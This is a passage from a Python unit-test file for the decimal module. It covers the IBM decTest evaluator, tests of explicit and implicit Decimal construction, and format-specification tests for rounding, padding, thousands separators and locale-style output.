'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
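# For example (hypothetical test id, shown only to illustrate the dispatch):
# a .decTest line such as
# sqtx001 squareroot 0.01 -> 0.1
# resolves through this adapter to fname == 'sqrt', so eval_equation() below
# ends up calling self.context.sqrt(Decimal('0.01')).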
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file, encoding="utf-8") as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
@requires_legacy_unicode_capi
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# negative zero: default behavior
('.1f', '-0', '-0.0'),
('.1f', '-.0', '-0.0'),
('.1f', '-.01', '-0.0'),
# negative zero: z option
('z.1f', '0.', '0.0'),
('z6.1f', '0.', ' 0.0'),
('z6.1f', '-1.', ' -1.0'),
('z.1f', '-0.', '0.0'),
('z.1f', '.01', '0.0'),
('z.1f', '-.01', '0.0'),
('z.2f', '0.', '0.00'),
('z.2f', '-0.', '0.00'),
('z.2f', '.001', '0.00'),
('z.2f', '-.001', '0.00'),
('z.1e', '0.', '0.0e+1'),
('z.1e', '-0.', '0.0e+1'),
('z.1E', '0.', '0.0E+1'),
('z.1E', '-0.', '0.0E+1'),
('z.2e', '-0.001', '-1.00e-3'), # tests for mishandled rounding
('z.2g', '-0.001', '-0.001'),
('z.2%', '-0.001', '-0.10%'),
('zf', '-0.0000', '0.0000'), # non-normalized form is preserved
('z.1f', '-00000.000001', '0.0'),
('z.1f', '-00000.', '0.0'),
('z.1f', '-.0000000000', '0.0'),
('z.2f', '-00000.000001', '0.00'),
('z.2f', '-00000.', '0.00'),
('z.2f', '-.0000000000', '0.00'),
('z.1f', '.09', '0.1'),
('z.1f', '-.09', '-0.1'),
(' z.0f', '-0.', ' 0'),
('+z.0f', '-0.', '+0'),
('-z.0f', '-0.', '0'),
(' z.0f', '-1.', '-1'),
('+z.0f', '-1.', '-1'),
('-z.0f', '-1.', '-1'),
('z>6.1f', '-0.', 'zz-0.0'),
('z>z6.1f', '-0.', 'zzz0.0'),
('x>z6.1f', '-0.', 'xxx0.0'),
('🖤>z6.1f', '-0.', '🖤🖤🖤0.0'), # multi-byte fill char
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_negative_zero_format_directed_rounding(self):
with self.decimal.localcontext() as ctx:
ctx.rounding = ROUND_CEILING
self.assertEqual(format(self.decimal.Decimal('-0.001'), 'z.2f'),
'0.00')
def test_negative_zero_bad_format(self):
self.assertRaises(ValueError, format, self.decimal.Decimal('1.23'), 'fz')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
